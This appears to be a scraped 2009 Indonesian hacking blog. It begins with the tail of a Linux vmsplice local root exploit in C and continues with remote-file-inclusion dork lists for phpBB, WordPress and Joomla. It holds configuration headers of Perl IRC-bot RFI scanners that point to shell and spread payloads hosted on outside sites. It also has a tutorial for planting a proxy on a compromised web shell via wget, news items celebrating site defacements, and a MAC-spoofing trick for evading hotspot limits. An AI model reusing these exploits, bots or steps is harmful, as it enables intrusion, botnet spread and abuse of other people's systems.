die("/bin/bash", errno);
}

int main(int argc, char *argv[])
{
int pi[2];
size_t map_size;
char * map_addr;
struct iovec iov;
struct page * pages[5];

uid = getuid();
gid = getgid();
setresuid(uid, uid, uid);
setresgid(gid, gid, gid);

printf("-----------------------------------\n");
printf(" Linux vmsplice Local Root Exploit\n");
printf(" By qaaz\n");
printf("-----------------------------------\n");

if (!uid || !gid)
die("!@#$", 0);

/*****/
pages[0] = *(void **) &(int[2]){0,PAGE_SIZE};
pages[1] = pages[0] + 1;

map_size = PAGE_SIZE;
map_addr = mmap(pages[0], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);

memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[0]);
printf("[+] page: 0x%lx\n", pages[1]);

pages[0]->flags = 1 << PG_compound;
pages[0]->private = (unsigned long) pages[0];
pages[0]->count = 1;
pages[1]->lru.next = (long) kernel_code;

/*****/
pages[2] = *(void **) pages[0];
pages[3] = pages[2] + 1;

map_size = PAGE_SIZE;
map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);

memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[2]);
printf("[+] page: 0x%lx\n", pages[3]);

pages[2]->flags = 1 << PG_compound;
pages[2]->private = (unsigned long) pages[2];
pages[2]->count = 1;
pages[3]->lru.next = (long) kernel_code;

/*****/
pages[4] = *(void **) &(int[2]){PAGE_SIZE,0};
map_size = PAGE_SIZE;
map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);
memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[4]);

/*****/
map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE;
map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);

memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);

/*****/
map_size -= 2 * PAGE_SIZE;
if (munmap(map_addr + map_size, PAGE_SIZE) < 0)
die("munmap", errno);

/*****/
if (pipe(pi) < 0) die("pipe", errno);
close(pi[0]);

iov.iov_base = map_addr;
iov.iov_len = ULONG_MAX;

signal(SIGPIPE, exit_code);
_vmsplice(pi[1], &iov, 1, 0);
die("vmsplice", errno);
return 0;
}

Download All

Monday 21 December 2009

Bug&dork New

.scan /index.php?_SERVER[DOCUMENT_ROOT]= “powered by Clicknet CMS”
.scan /include/admin.lib.inc.php?site_path= “rgboard
.scan /header.php?base_folder= “Powered by Bab.stats”
.scan /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=& mosConfig_absolute_path= “/index.php?option=com_content”
.scan /admin.php?include_path= “Guestbook”
.scan //main.php?_zb_path= “main.php”
.scan //login.php?_zb_path= “login.php”
.scan /////?_SERVER[DOCUMENT_ROOT]= “/board” site:.kr
.scan /admin.php?include_path= “gastenboek”
.scan /docebo/doceboLms//class/class.dashboard_lms.php?where_framework= “doceboLms”
.scan /encapscms_PATH/core/core.php?root= “encapscms 0.3.6″ “encapscms 0.3.6″
.scan /PNphpBB2/includes/functions_admin.php?phpbb_root_path= “/PNphpBB2/”
.scan /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path= “PHP-NUKE”
.scan /s_loadenv.inc.php?DOCUMENT_ROOT= “netcat require”
.scan /index.php?DOCUMENT_ROOT= “netcat_files”
.scan /ray.3.5/modules/global/inc/content.inc.php?sIncPath= “boonex”
.scan /?page= /?pagedb=?
.scan ?sourcedir= index.php?sourcedir=
.scan /security/include/_class.security.php?PHPSECURITYADMIN_PATH= “web3news”
.scan /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath= “/plugins/sniplets/”

Sunday 20 December 2009

Meffy Scanner

This summary is not available. Please click here to view the post.

Albania Scanner

***************************
AUTOR: Abah_benu
DATE :Juli 2008
LINGUAGE: perl (.pl)
**************************

use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;


my $linas_max='10';
my $sleep='1';
my $processo = "httpd -SasSL45";
my $cmd="http://henry14.isfreeweb.com/sh???";
my $id="http://henry14.isfreeweb.com/id.txt???";
my $spread="http://henry14.isfreeweb.com/spread.txt???";
my $server="irc.kamtiez.punked.us";
my $porta="7000";
my $numero=int(rand(100));
my $nick="NabiLa[".$numero."]";
my $canale="#kill-9";
my $verbot = "1.01";
my $stringa = "!scan".$numero;
my $adm = "arianom";
my $out = "".$numero;
my $c0der= "arianom"; #si prega di lasciarlo cos?


Download [lengkap + id]

Defacing malaysuck site

JAKARTA - Seorang hacker yang mengaku bernama Arianom berhasil membobol forum pendukung partai incumbent Malaysia, UMNO.

"Site Down. Stop penyiksaan terhadap warga negara Indonesia," tulis sang hacker yang ditinggalkan dalam situs tersebut, lengkap dengan gambar sebuah tengkorak bajak laut yang sedang menggigit golok.

Ditelusuri okezone, Sabtu (8/8/2009), aksi ini ternyata telah dilakukan 'arianom' sejak Jumat (7/8/2009) sore kemarin. Sayangnya hingga saat ini situs yang bertajuk 'Kelab Maya UMNO' ini masih belum bisa diakses sama sekali.

Kelab Maya United Malaysian National Organizations (UMNO) ini sebenarnya lebih ditujukan sebagai ajang diskusi antarpenggemar UMNO. Isi berita dan diskusi yang dilayangkan kebanyakan berkutat mengenai langkah musuh-musuh UMNO, khususnya Anwar Ibrahim, dalam menjatuhkan partai milik Mahathir Muhammad dan Najib Tun Razak ini.

Selain itu, berita mengenai keberhasilan kader dan anggota partai memasuki kabinet pemerintahan juga menghiasi situs ini.

Sayangnya, berita sukses tersebut harus rela menghilang dan tergantikan dengan gambar aneh milik sang hacker, Arianom, yang mengaku berasal dari kelompok hacker 'all kill-9 crew'. (srn)

Defacing malaysian site

VIVAnews - Meski polemik soal penayangan Tari Pendet dalam iklam 'Enigmatic Malaysia' di Discovery Channel dan sengketa Pulau Jemur, sudah mereda, bukan berarti sentimen anti negeri jiran, Malaysia lalu menghilang.

Sekelompok cracker yang mengatasnamakan diri sebagai 'Arianom' mengambil alih situs Malaysia, http://pkgparitraja.com pada Jumat 25 September 2009 pukul 21.13 WIB.

Berdasarkan penelusuran VIVAnews, situs tersebut adalah milik Pusat Kegiatan Guru Parit Raja, Batu Pahat, yang beralamat di SK Pintas Puding, Km 21 Jalan Pintas Puding, 86400 Parit Raja, Batu Pahat Johor, Malaysia.

Mulai Jumat malam tadi, situs tersebut tak bisa diakses dan diubah tampilannya, alias deface.

Dalam laman tersebut, kini tertera kalimat 'Hacked by Arianom. Situs ini diklaim oleh rakyat Indonesia sebagai bentuk balasan atas pengklaiman beberapa kebudayaan Indonesia oleh pemerintah Malaysia."

Di tengah bendera Malaysia, 'jalur gemilang' juga ditulisi kalimat "Situs ini Diklaim oleh Rakyat Indonesia. Hacked by Arianom, Kill-9 Crew."

Barisan kalimat yang mirip protes dituliskan dalam laman tersebut. Berikut bunyinya:

"Kalian boleh sebut kami indon. Kami sebut kalian malingsia, maling kekayaan dan budaya Indonesia.

Kami menghimbau agar pemerintah Malaysia menghentikan dan mengembalikan beberapa budaya yang telah diklaim oleh Malaysia,

Silahkan klaim aja itu Noordin M Top, kami rasa dia asset Malaysia yang sangat berharga."

Sebelum aksi ini, tepat di peringatan kemerdekaan Malaysia ke 52 pada 31 Agustus 2009, sejumlah cracker mengubah tampilan sejumlah situs milik Malaysia.
• VIVAnews

Saturday 19 December 2009

Rose Scanner

***************************
AUTOR: Tukulesto
DATE :December 2008
LINGUAGE: perl (.pl)
***************************

#!/usr/bin/perl

########################################
## Multi RFI - SCAN Commands ##
## By TuX_Sh4D0W ##
## Released : 11 December 2008 ##
## ---------------------------------- ##
##.---..-..-..-.,-..-..-..-. .---.. ##
##`| |'| || || . < | || || |__ | |- \##
## `-' `----'`-'`-'`----'`----'`---'`-##
##------------------------------------##
########################################

use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;


###################
## CONFIGURATION ##
###################

my $id = "http://www.bwdi.or.kr/bbs/idrose.txt??";
my $shell = "http://styrovit.ru/includes/sh.txt??";
my $pbot = "http://styrovit.ru/includes/pbotz.txt??";
my $spread = "http://www.bwdi.or.kr/bbs/spread-rose.txt??";
#my $id = "http://www.bwdi.or.kr/bbs/idrose.txt??";
#my $shell = "http://styrovit.ru/includes/sh.txt??";

@ircservers = (

"209.41.180.98",

#"localhost",
#"209.41.180.98",
#"209.41.180.98",
#"209.41.180.98",
#"209.41.180.98"

);


Download [lengkap + id]

Friday 18 December 2009

About | MIRC

IRC adalah singkatan dari Internet Relay Chat. Secara kasar, IRC adalah media untuk berbicara real time dengan orang lain di Internet. IRC bekerja seperti radio CB, hanya saja ente mengetikkan semuanya apa yang ingin bicarakan pada keyboard dan ente dapat berbicara dengan semua orang. ente pun dapat melihat ketikan orang lain pada layar monitor.

Internet Relay Chat diciptakan pada tahun ‘80an hasil dari penyempurnaan komunikasi antar UNIX. Ketika berkomunukasi antar dua orang atau lebih secara hampir bersamaan. IRC adalah jaringan server yang menrelai percakapan dari pengguna yang terkoneksi pada server tersebut. Jaringan IRC tersebar di seluruh dunia. Siapa saja, di mana saja, dengan mempergunakan internet koneksi dapat berpartisipasi untuk ikut.

Banyak sekali channels diskusi pada IRC. ente dapat bergabung pada diskusi setelah ente memilih nick name dan bergabung di channel. Jika ingin mencoba IRC, ente dapat download MIRC dari official sites mereka.
Untuk memulai, tahap standar adalah sebagai berikut:

Semua perintah diawali dengan tanda slash ('/')
Pertama gabung server (banyak server di dunia ini), misalnya /server irc-2.texas.net
Pilih nick name misal: /nick anakblue
Untuk melihat daftar channel yang ada, ketik /list
Gabung channel, misalnya /join #kill-9
Bicara deh....


Gampangnya... ente bisa download script2 yang udah ready dengan shortcut/perintah pendek dengan bermacam-macam variasi:

* Mirc601.exe (1.2 MB) > Ini yang standar buanget !!
* Mr^P^.zip (1.9 MB) > (Thanks to Projo...)
* Boss2002.zip (3.2 MB)
* GeniusIRC2.exe (4.7 MB)

Make Proxy From Shell

Mungkin kita sudah tidak asing lagi dengan yang nama nya proxy…. Kalo saya definisikan proxy adalah sebuah mirror yang penggunaannya ditujukan untuk sebuah private yang berguna untuk menyamarkan ip address kita. Kali ini akan dijelaskan sedikit cara membuat proxy melalui shell dari sebuah web hasil injectkan.

Aku anggap kamu sudah bisa inject shell and let’s go to begin..

* masuk ke shell yang kita inject
* cari direktori yang memberikan permission 777 dengan command “find / -perm 777 -type d” jika ga ada, langsung aja menuju direktori /tmp
* wget file proxynya . commandnya “wget url/file” contoh: “wget http://3xploit.110mb.com/proxy.tgz” jika ga berhasil, coba pake command lwp-download atau fetch tapi dengan url yang lengkap, contoh commandnya “lwp-download http://3xploit.110mb.com/proxy.tgz
* kalo tidak bisa juga, pakailah script injectkan r57 ato c99 sehingga ada fitur untuk uploadnya. dan uploadlah file proxy.tgz dengan fitur tersebut. jika belum punya filenya, donlot saja secara manual di http://3xploit.110mb.com/proxy.tgz dan kemudian di upload.
* extract filenya dengan command “tar -zxvf proxy.tgz”
* setelah diextract, masuk ke direktori pro dengan command “cd pro”
* eksekusi file xh, commandnya adalah “ ./xh -s ./httpd ./prox -a -d -p5050”
* cek hidup atau tidaknya proxy kamu di IRC channel yang terdapat bot untuk cek ip. contohnya adalah #kill-9 @irc.indonesiancoder.us
* command untuk ceknya biasanya bervariasi. tapi kurang lebih seperti ini “.port ip 5050” contohnya”.port 122.168.9.70 5050”

Ket:

* Deafult port diatas adalah 5050 dan dapat di edit pada sesuai keinginan kita pada “menu.conf”
* Ini adalah tutor untuk pembuatan proxy pada web hasil inject
* Tutor ini hanya berjalan pada mesin Linux ato keluarga UNIX
* Semua command di atas tanpa tanda petik dua (”)

Rafly Scanner

#!/usr/bin/perl

#################################
## CERME RFI Scanner Bot v2.4 ##
## By Rafly ##
## Copyleft July 2008 ##
## Usage: perl ussil.pl ##
#################################

use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;

###################
## CONFIGURATION ##
###################

my $id = "http://www.urisan.tche.br/usill-id.txt?";
my $shell = "[kill-9]";
my $spread = "http://www.urisan.tche.br/bajo-spread.txt?";
my $spreads = "http://www.urisan.tche.br/usil-spreads.txt?";
#my $id = "http://www.urisan.tche.br/usill-id.txt?";
#my $shell = "http://www.urisan.tche.br/sh.txt";
@ircservers = (
"irc.indonesiancoder.us",
#"localhost",
#"irc.indonesiancoder.us",
#"irc.indonesiancoder.us",
#"irc.indonesiancoder.us",
#"irc.indonesiancoder.us"
);

my $chan1 = "#kill-9";
my $chan2 = "#kill-9";
my $chan3 = "#kill-9";
my $c1k = "cerme";
my $c2k = "cerme";
my $ircd = $ircservers[rand(scalar(@ircservers))];
my $port = "6667";
my $nick = "ScanNeR[".int(rand(1000))."]";
my $ident = "Priv[".int(rand(1000))."]";
my $admin = "arianom";


Download [lengkap + id]

Pittbull Scanner

***************************
AUTORE: Arianom
DATE :April 2008
LINGUAGE: perl (.pl)
***************************

#!/usr/bin/perl
#
# Release Name : aria[kill-pitbull]
#
# RFi Scanner Christmas Release ! :D
#
# ------------- [% Notes %] -------------
# This rfi scanner contains piece of code from; PitBull CreW, Mic22, Inphex.
# And also lets just say more version wil come :P
#
# With this release you must be happy since its the best RFi Scanner around.

# And its even public, happy x-mas ! :D
#
# You can also PM the bot with your scan, this is handy when you have loaded multiple scanners.
#
# ------------- [% Basic Commands %] -------------
# !rfi Bug Dork ( Ex. !rfi index.php?page= "index.php?page=" ) Normal RFi Scan
# !lfi Bug Dork ( Ex. !lfi index.php?page= "index.php?page=" ) Normal LFi Scan
#
# ------------- [% Special Commands %] -------------
# !autorfiscan Bug Dork ( Ex. !autorfiscan index.php?page= "index.php?page=" ) Auto site: Scan
# !autorfipath Bug Dork ( Ex. !autorfipath page= ) Autopath scan like index.php,home.php,contact.php etc.
# !afsluiten ( Ex. !afsluiten ) make bot leave
# !info ( Ex. !info ) shows info
#
# ------------- [% Version %] -------------
# 1.0 Stable Public Release
#
# ------------- [% ASC %] -------------
# Mafia_KB, i hope i pretty fucked up your sell
# asking 2000 fucking euros for a crappy scan ?
# this one is 1000 times better so i hope
# it affects your sell even more lol.


use HTTP::Request;
use LWP::UserAgent;
use IO::Socket::INET;

#################
#[Configuration]#
#################

my $response = "http://www.emabe.com/administrator/templates/response.txt??"; # included in zip as response.txt
my $test = "http://www.emabe.com/administrator/templates/test.txt??"; # included in zip as test.txt
my $printcmd = "http://www.yourhost.com/sh.txt??";
my $responselfi = "/../../../../../../../../etc/passwd";
my $printcmdlfi = "/../../../../../../../../etc/passwd";
my $spread = "http://yourhost.com/pbotz.txt??";
my $nickname = "ngising|".(int(rand(999)));
my $ident = "RFiBeast";
my $channel = "#kill-9";
my $server = "irc.pengangguran.us.to";
my $port = 6667;

#################
#[Configuration]#
#################


Download [lengkap + id]

Thursday 17 December 2009

SQL Injection Attacks by Example

A customer asked that we check out his intranet site, which was used by the company's employees and customers. This was part of a larger security review, and though we'd not actually used SQL injection to penetrate a network before, we were pretty familiar with the general concepts. We were completely successful in this engagement, and wanted to recount the steps taken as an illustration.

"SQL Injection" is subset of the an unverified/unsanitized user input vulnerability ("buffer overflows" are a different subset), and the idea is to convince the application to run SQL code that was not intended. If the application is creating SQL strings naively on the fly and then running them, it's straightforward to create some real surprises.

We'll note that this was a somewhat winding road with more than one wrong turn, and others with more experience will certainly have different -- and better -- approaches. But the fact that we were successful does suggest that we were not entirely misguided.

There have been other papers on SQL injection, including some that are much more detailed, but this one shows the rationale of discovery as much as the process of exploitation.

Wednesday 16 December 2009

Bug Dork PHPBB

/path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=
/includes/functions_portal.php?phpbb_root_path=
/includes/functions_mod_user.php?phpbb_root_path=
/includes/openid/Auth/OpenID/BBStore.php?openid_root_path=
/language/lang_german/lang_main_album.php?phpbb_root_path=
link_main.php?phpbb_root_path=
/inc/nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=
MOD_forum_fields_parse.php?phpbb_root_path=
/codebb/pass_code.php?phpbb_root_path=
/codebb/lang_select?phpbb_root_path=
includes/functions_nomoketos_rules.php?phpbb_root_path=
includes/functions.php?phpbb_root_path=
/includes/functions.php?phpbb_root_path=
/ezconvert/config.php?ezconvert_dir=
/includes/class_template.php?phpbb_root_path=
/includes/usercp_viewprofile.php?phpbb_root_path=
/includes/functions.php?phpbb_root_path=
/includes/functions.php?phpbb_root_path=
menu.php?sesion_idioma=
/includes/functions.php?phpbb_root_path=
/admin/admin_linkdb.php?phpbb_root_path=
/admin/admin_forum_prune.php?phpbb_root_path=
/admin/admin_extensions.php?phpbb_root_path=
/admin/admin_board.php?phpbb_root_path=
/admin/admin_attachments.php?phpbb_root_path=
/admin/admin_users.php?phpbb_root_path=
/includes/archive/archive_topic.php?phpbb_root_path=
/admin/modules_data.php?phpbb_root_path=
/faq.php?foing_root_path=
/index.php?foing_root_path=
/list.php?foing_root_path=
/login.php?foing_root_path=
/playlist.php?foing_root_path=
/song.php?foing_root_path=
/gen_m3u.php?foing_root_path=
/view_artist.php?foing_root_path=
/view_song.php?foing_root_path=
/login.php?foing_root_path=
/playlist.php?foing_root_path=
/song.php?foing_root_path=
/flash/set_na.php?foing_root_path=
/flash/initialise.php?foing_root_path=
/flash/get_song.php?foing_root_path=
/includes/common.php?foing_root_path=
/admin/nav.php?foing_root_path=
/admin/main.php?foing_root_path=
/admin/list_artists.php?foing_root_path=
/admin/index.php?foing_root_path=
/admin/genres.php?foing_root_path=
/admin/edit_artist.php?foing_root_path=
/admin/edit_album.php?foing_root_path=
/admin/config.php?foing_root_path=
/admin/admin_status.php?foing_root_path=
language/lang_english/lang_prillian_faq.php?phpbb_root_path=
/includes/functions_mod_user.php?phpbb_root_path=
/language/lang_french/lang_prillian_faq.php?phpbb_root_path=
/includes/archive/archive_topic.php?phpbb_root_path=
/functions_rpg_events.php?phpbb_root_path=
/admin/admin_spam.php?phpbb_root_path=
/includes/functions_newshr.php?phpbb_root_path=
/zufallscodepart.php?phpbb_root_path=
/mods/iai/includes/constants.php?phpbb_root_path=
/root/includes/antispam.php?phpbb_root_path=
/phpBB2/shoutbox.php?phpbb_root_path=
/includes/functions_mod_user.php?phpbb_root_path=
/includes/functions_mod_user.php?phpbb_root_path=
/includes/journals_delete.php?phpbb_root_path=
/includes/journals_post.php?phpbb_root_path=
/includes/journals_edit.php?phpbb_root_path=
/includes/functions_num_image.php?phpbb_root_path=
/includes/functions_user_viewed_posts.php?phpbb_root_path=
/includes/themen_portal_mitte.php?phpbb_root_path=
/includes/logger_engine.php?phpbb_root_path=
/includes/logger_engine.php?phpbb_root_path=
/includes/functions_static_topics.php?phpbb_root_path=
/admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=
/includes/functions_kb.php?phpbb_root_path=
/includes/bbcb_mg.php?phpbb_root_path=
/admin/admin_topic_action_logging.php?setmodules=attach&phpbb_root_path=
/includes/pafiledb_constants.php?module_root_path=
/index.php?phpbb_root_path=
/song.php?phpbb_root_path=
/faq.php?phpbb_root_path=
/list.php?phpbb_root_path=
/gen_m3u.php?phpbb_root_path=
/playlist.php?phpbb_root_path=
/language/lang_english/lang_activity.php?phpbb_root_path=
/language/lang_english/lang_activity.php?phpbb_root_path=
/blend_data/blend_common.php?phpbb_root_path=
/blend_data/blend_common.php?phpbb_root_path=
/modules/Forums/admin/index.php?phpbb_root_path=
/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=
/modules/Forums/admin/admin_board.php?phpbb_root_path=
/modules/Forums/admin/admin_disallow.php?phpbb_root_path=
/modules/Forums/admin/admin_forumauth.php?phpbb_root_path=
/modules/Forums/admin/admin_groups.php?phpbb_root_path=
/modules/Forums/admin/admin_ranks.php?phpbb_root_path=
/modules/Forums/admin/admin_styles.php?phpbb_root_path=
/modules/Forums/admin/admin_user_ban.php?phpbb_root_path=
/modules/Forums/admin/admin_words.php?phpbb_root_path=
/modules/Forums/admin/admin_avatar.php?phpbb_root_path=
/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=
/modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=
/modules/Forums/admin/admin_forums.php?phpbb_root_path=
/modules/Forums/admin/admin_mass_email.php?phpbb_root_path=
/modules/Forums/admin/admin_smilies.php?phpbb_root_path=
/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=
/modules/Forums/admin/admin_users.php?phpbb_root_path=
/stat_modules/users_age/module.php?phpbb_root_path=
/includes/functions_cms.php?phpbb_root_path=
/m2f/m2f_phpbb204.php?m2f_root_path=
/m2f/m2f_forum.php?m2f_root_path=
/m2f/m2f_mailinglist.php?m2f_root_path=
/m2f/m2f_cron.php?m2f_root_path=
/lib/phpbb.php?subdir=
/includes/functions_mod_user.php?phpbb_root_path=
/includes/functions.php?phpbb_root_path=
/includes/functions_portal.php?phpbb_root_path=
/includes/functions.php?phpbb_root_path=
/includes/functions_admin.php?phpbb_root_path=
/toplist.php?f=toplist_top10&phpbb_root_path=
/admin/addentry.php?phpbb_root_path=
/includes/kb_constants.php?module_root_path=
/auth/auth.php?phpbb_root_path=
/auth/auth_phpbb/phpbb_root_path=
/auction/auction_common.php?phpbb_root_path=
/auth/auth_SMF/smf_root_path=
/auth/auth.php?smf_root_path=

Tuesday 15 December 2009

Bug Dork WordPress

index/wp-content/plugins/Enigma2.php?boarddir=
mygallery/myfunctions/mygallerybrowser.php?myPath=
plugins/wp-table/js/wptable-button.phpp?wpPATH=
plugins/wordtube/wordtube-button.php?wpPATH=
plugins/myflash/myflash-button.php?wpPATH=
plugins/BackUp/Archive.php?bkpwp_plugin_path=
plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=
plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=
plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=
plugins/sniplets/modules/syntax_highlight.php?libpath=

Bajo Sanner

***************************
AUTOR: arianom
DATE :Desember 2009
LINGUAGE: perl (.pl)
**************************

#!/usr/bin/perl
$process = "/usr/sbin/arianom";
my $printcmd = "http://kill-nine.co.nr??";
my $id = "http://www.urisan.tche.br/~escola//asu/bajo-id.txt??";
my $id = "http://www.urisan.tche.br/~escola//asu/bajo-id.txt??";
my $spread = "http://www.urisan.tche.br/~escola//asu/bajo-spread.txt??";
my $spreads = "http://www.urisan.tche.br/~escola//asu/bajo-spread.txt??";
my $ircserver = "irc.indonesiancoder.us";
my $start = "!scan";
my $port = "6667";
my $nickname = "sedih" . int( rand(999) ) . "]";
my $admin = "arianom";
my $channel = "#kill-9"; ## the normal chan to scan, and see the results too :P
my $chanres = "#kill-9"; ## the channel where u can find all the results of the bot
my $verz = "Pbot RFI Scanner v1.0 beta";


print "\n";
print " Priv 8 Scanner\n";
print " Author: Arianom\n";
print " Release $verz\n";
print " Server $ircserver:$port\n";
print " $channel and $chanres\n";
print " Enjoy ;)\n\n";

use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
require LWP;
$|++;


Download [lengkpa + id]

HACK WIFI

Terkadang lagi asik asik ngenet di hotspot tiba2 putus,…katanya sih dibatasi waktu biar user tidak dapat mengakses internet lagi…. Wah wah wah … repot banget sih…hanya ingin mendapatkan informasi di internet…seluruh kegiatan kita dibatasi…edun…alahhhhhhhhhhh … pembatasan diri…makanya kapan rakyat Indonesia bias mendapatkan informasi gratis di internet … kapan seluruh sector internet tidak dijadikan ajang bisnis…ini yang membuat rakyat Indonesia menjadi tidak percaya dengan internet … dan dibodohi oleh bangsa lain… di Negara maju access internet tidak dibatasi dan GRATIS…ya sekali lagi GRATIS … hanya disini saja dijadikan sumber inspirasi bagi para pebisnis agar meraup keuntungan sebanyak –banyaknya … padahal kita orang Indonesia sangat haus ilmu, apalagi soal computer, kapan lagi sih …. Hihihihihi … okay untuk mengatasi ini ada tips dan trick untuk merubah mac agar kita bias bebas berkeliaran di dunia cyber hihihihi…

Okay…. Langsung to the point aja yah…,pertama cari hotspot…kalo bisa menyediakan hotspot gratis…tapi dibatasi oleh jam ajah gituh…, terus maeennnnnnn aja ampe abis waktunya …

nah bis itu bakal ada pembatasan akses seperti yang ditunjukkan gambar di atas .. atau ada tulisan “MAAF WAKTU BERINTERNET ANDA TELAH ABIS, SILAHKAN KEMBALI BESOK”, setannnnnnnn!!!!! kapan indonesia mo maju kalo internet dibatasi terus… yaaaa mo gak mau deh diakalin.

PROSES PEMBATASAN WAKTU

proses pembatasan waktu bisa dibatasi dari access point yang ada di kafe tersebut, dan biasanya pembatasan tersebut menggunakan MAC address, kenapa MAC Address???Kok gak IP Address??umh…kalo IP address bisa diganti sendiri kan lewat komputer, tapi kalau MAC, mungkin bisa di linux, tapi kalo di windows??? ya donlot lah program buat ngerubah MAC di:

klik disini untuk download software TMAC
kemudian install dan jalankan, maka akan muncul seperti gambar berikut:

kemudian klik tombolnya CHANGE MAC untuk mengganti mac address, lalu klik RANDOM MAC ADDRESS,
nah…ntar mac addressnya bakal dirandom sesuai dengan metode yang benar dari programnya, lalu klik CHANGE NOW!, langsung deh IP address anda berubah.

tunggu beberapa saat agar kompie merefresh perubahan ini kemudian buka lagi situs yang ingin dikunjungi, BANG BANG BANG!!!… dapet access 2 jam gratis lagi euy …

bisa dilihat tombol CLICK HERE itu jika ditekan kita mendapat free access, okay … mungkin sekian… dulu darri sayah …

Joomla Bugs

/components/com_flyspray/startdown.php?file=
/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=
/components/com_simpleboard/file_upload.php?sbp=
/components/com_hashcash/server.php?mosConfig_absolute_path=
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=
/components/com_performs/performs.php?mosConfig_absolute_path=
/components/com_forum/download.php?phpbb_root_path=
/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=
/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=
/components/minibb/index.php?absolute_path=
/components/com_smf/smf.php?mosConfig_absolute_path=
/modules/mod_calendar.php?absolute_path=
/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=
/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=
/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=
/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=
/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=
/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=
/components/com_securityimages/configinsert.php?mosConfig_absolute_path=
/components/com_securityimages/lang.php?mosConfig_absolute_path=
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=
/akocomments.php?mosConfig_absolute_path=
/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=
/cropcanvas.php?cropimagedir=
/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=
/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=
/components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path=
/components/com_zoom/includes/database.php?mosConfig_absolute_path=
/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=
/components/com_fm/fm.install.php?lm_absolute_path=
/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=
/components/com_lmo/lmo.php?mosConfig_absolute_path=
/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=
/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=
/administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=
/administrator/components/com_webring/admin.webring.docs.php?component_dir=
/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=
/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=
/administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=
/components/com_mambowiki/Mam***ogin.php?IP=
/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=
/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=
/components/com_cpg/cpg.php?mosConfig_absolute_path=
/components/com_moodle/moodle.php?mosConfig_absolute_path=
/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=
/components/com_mospray/scripts/admin.php?basedir=
/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=
/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=
/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=
/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=
/components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=
/components/com_madeira/img.php?url=
/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=
/components/com_bsq_sitestats/external/rssfeed.php?baseDir=
/com_bsq_sitestats/external/rssfeed.php?baseDir=
/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=
